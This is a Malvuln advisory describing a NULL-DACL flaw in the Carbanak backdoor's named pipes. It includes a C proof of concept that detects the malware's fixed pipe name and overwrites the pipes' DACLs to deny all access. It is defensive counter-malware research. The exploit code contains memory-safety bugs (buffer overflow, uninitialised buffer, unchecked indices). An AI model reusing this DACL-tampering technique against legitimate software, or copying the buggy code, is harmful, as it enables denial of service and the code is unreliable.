Exploit for Backdoor.Win32 Carbanak (Anunak) MVID-2024-0667 Named Pipe NULL DACL

Name: Exploit for Backdoor.Win32 Carbanak (Anunak) MVID-2024-0667 Named Pipe NULL DACL
Rating: 5 (148 reviews)
2024-01-10 | CVSS 7.4
## https://sploitus.com/exploit?id=PACKETSTORM:176442
Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024  
Original source: https://malvuln.com/advisory/b8e1e5b832e5947f41fd6ae6ef6d09a1.txt  
Contact: malvuln13@gmail.com  
Media: twitter.com/malvuln  
  
Threat: Backdoor.Win32 Carbanak (Anunak)  
Vulnerability: Named Pipe Null DACL  
Family: Carbanak  
Type: PE32  
MD5: b8e1e5b832e5947f41fd6ae6ef6d09a1  
Vuln ID: MVID-2024-0667  
Dropped files: AlhEXlUJ.exe, AlhEXlUJbVpfX1EMVw.bin  
Disclosure: 01/09/2024  
  
Description: Carbanak malware creates 8 named pipes used for C2 and interprocess communications and grants RW access to the Everyone user group.  
Low privileged users can modify the pipes DACLs, removing rights for Everyone denying access to all users. First 6 pipes are created by its parent process  
and last 2 by the child process. The pipes names are randomly generated each time it is run all except for one JFNfVUYDXmlZQV.  
  
Therefore, we can detect Carbanak by that one pipe, as the "JFNfVUYDXmlZQVI" pipe is always created regardless of other randomly named pipes.  
Listing Carbanaks named pipes they get grouped as they are created at same time with 2 of them listed prior to the JFNfVUYDXmlZQVI pipe.  
  
Carbanak creates a directory named "Mozilla" under ProgramData with hidden files, one of which is AlhEXlUJ.exe used by the service it creates   
which runs as SYSTEM. The malwares service names created seem to use an already existing service name and add "Sys" at the end of its name.  
  
Exploitation steps, output all named pipes and look for "JFNfVUYDXmlZQVI" if detected, exploit the DACL on 2 previously listed pipes and 5 pipes listed after.  
  
Successfully tested in VM environment.  
  
Carbanak IPC Named Pipes:  
  
\\.\Pipe\cltjLnYRKKjUESTvgGdmERTb   
RW Everyone  
\\.\Pipe\tGYNSgZvVXwumEhdcF   
RW Everyone  
\\.\Pipe\JFNfVUYDXmlZQVI <===== ALWAYS CREATED  
RW Everyone  
\\.\Pipe\PoUXbOHFRuUZAufnlpMZoqdtIfOX  
RW Everyone  
\\.\Pipe\oBcVHguxbnjGbSgkJptifqvNFgD  
RW Everyone  
\\.\Pipe\iDToHxpSCbEIEHPBeQ  
RW Everyone  
\\.\Pipe\YutsGUYwwUusszByeuXUQK  
RW Everyone  
\\.\Pipe\UfnQmAUTVtEkYvMoUWAZekAuWZHe  
RW Everyone  
  
Exploit/PoC:  
#include "windows.h"  
#include "stdio.h"  
#include "accctrl.h"  
#include "aclapi.h"  
  
/*  
Carbanak: 48d208b87b29d50bb160f336c94b681e232b0f90e8c02175e593d60737369c13  
DACL IPC named pipes created and grants RW access for Everyone.  
We can identify Carbanak as out of the eight pipes it creates with random names the pipe  
named JFNfVUYDXmlZQVI is always created. Pipes are typically grouped as they are created  
at same time and typically 2 are previous to pipe JFNfVUYDXmlZQVI and others are created after  
Output named pipes find JFNfVUYDXmlZQVI and exploit DACL on 2 previous and 5 after.  
Successfully tested in VM environment.  
By Malvuln  
**/  
  
/** DISCLAIMER:  
Author is NOT responsible for any damages whatsoever by using this software or improper malware  
handling. By using this code you assume and accept all risk implied or otherwise.  
**/  
  
#define CARBANAK_PIPE "JFNfVUYDXmlZQVI"  
#define MAX_TOKENS 1024  
#define DELIMITER "\n"  
  
int str2Array(char*** argv, char *str);  
int Exploit(char *carbanak_pipe);  
  
int str2Array(char*** argv, char *str){  
char* buffer;  
int argc;  
buffer = (char *) malloc(strlen(str) * sizeof(char));  
strcpy(buffer, str);  
(*argv) = (char**) malloc(MAX_TOKENS * sizeof(char**));  
argc = 0;   
(*argv)[argc++] = strtok(buffer, DELIMITER);  
while ((((*argv)[argc] = strtok(NULL, DELIMITER)) != NULL) &&  
(argc < MAX_TOKENS)) ++argc;  
return argc;  
}  
  
int main(void){  
  
system("dir /b \\\\.\\pipe\\\\ > tmp.sys");  
  
int ch;  
char tmp[1];  
FILE *fp = fopen("tmp.sys", "r");  
fseek(fp, 0, SEEK_END);  
int bytes = ftell(fp) + 256;  
rewind(fp);  
char x[bytes];  
while((ch = fgetc(fp)) != EOF){  
if(feof(fp)){  
break;  
}  
sprintf(tmp, "%c", ch);  
strcat(x, tmp);  
}  
fclose(fp);  
  
char **A;  
int i, result = str2Array(&A, x);  
int delay = 300;  
int rc;  
BOOL infected=FALSE;  
  
for(i=0;i<result;i++){  
  
if(strcmp(A[i], CARBANAK_PIPE)==0){  
printf("[+] Carbanak (Anunak) malware IPC exploit\n");  
printf("[!] MD5: b8e1e5b832e5947f41fd6ae6ef6d09a1\n");  
printf("[!] Named Pipe %s%s\n", CARBANAK_PIPE, " detected!");  
printf("[+] Attack started...\n\n");  
  
infected = TRUE;  
  
Exploit(A[i]);  
Sleep(delay);  
  
Exploit(A[i-2]);  
Sleep(delay);  
  
Exploit(A[i-1]);  
Sleep(delay);  
  
Exploit(A[i+1]);  
Sleep(delay);  
  
Exploit(A[i+2]);  
Sleep(delay);  
  
Exploit(A[i+3]);  
Sleep(delay);  
  
Exploit(A[i+4]);  
Sleep(delay);  
  
rc = Exploit(A[i+5]);  
}  
}  
if(!infected){  
printf("[+] Carbanak (Anunak) malware IPC Exploit \n");  
printf("[+] MD5: b8e1e5b832e5947f41fd6ae6ef6d09a1\n");  
printf("[!] Named Pipe %s%s", CARBANAK_PIPE, " not found on the system.\n");  
printf("[!] Aborting...");  
}  
if(rc==0){  
printf("\n[!] Done!");   
}  
printf("\n[+] By Malvuln circa 2024\n\n");  
system("pause");  
  
return 0;  
}  
  
  
int Exploit(char *malpipe){  
  
char MALPIPE_PREFIX[269] = "\\\\.\\pipe\\";  
strcat(MALPIPE_PREFIX, malpipe);  
HANDLE hPipe = CreateFileA((LPCSTR)MALPIPE_PREFIX, GENERIC_WRITE | WRITE_DAC, 0, NULL, OPEN_EXISTING, 0, NULL);  
  
PACL pOldDACL = NULL;  
PACL pNewDACL = NULL;  
  
if (hPipe == INVALID_HANDLE_VALUE){   
int rc = GetLastError();  
if(rc==5){  
printf("[!] Access Denied for pipe: %s\n", malpipe);  
}  
return 1;  
}  
  
if(GetSecurityInfo(hPipe, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, &pOldDACL, NULL, NULL) != ERROR_SUCCESS){  
printf("[!] Error: %d", GetLastError());  
return 1;  
}  
  
TRUSTEE trustee[1];  
trustee[0].TrusteeForm = TRUSTEE_IS_NAME;  
trustee[0].TrusteeType = TRUSTEE_IS_GROUP;  
trustee[0].ptstrName = TEXT("Everyone");  
trustee[0].MultipleTrusteeOperation = NO_MULTIPLE_TRUSTEE;  
trustee[0].pMultipleTrustee = NULL;  
  
EXPLICIT_ACCESS explicit_access_list[1];  
ZeroMemory(&explicit_access_list[0], sizeof(EXPLICIT_ACCESS));  
  
explicit_access_list[0].grfAccessMode = DENY_ACCESS;   
explicit_access_list[0].grfAccessPermissions = GENERIC_ALL;  
explicit_access_list[0].grfInheritance = NO_INHERITANCE;  
explicit_access_list[0].Trustee = trustee[0];  
  
if(SetEntriesInAcl(1, explicit_access_list, pOldDACL, &pNewDACL) != ERROR_SUCCESS){  
printf("[!] Error: %d", GetLastError());  
return 1;  
}  
  
if(SetSecurityInfo(hPipe, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, pNewDACL, NULL) != ERROR_SUCCESS){   
printf("[!] Error: %d", GetLastError());  
return 1;   
}else{  
printf("[+] Modifying IPC Pipe DACL ==> %s\n", MALPIPE_PREFIX);  
}  
  
LocalFree(pNewDACL);  
LocalFree(pOldDACL);  
CloseHandle(hPipe);  
  
return 0;  
}  
  
Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).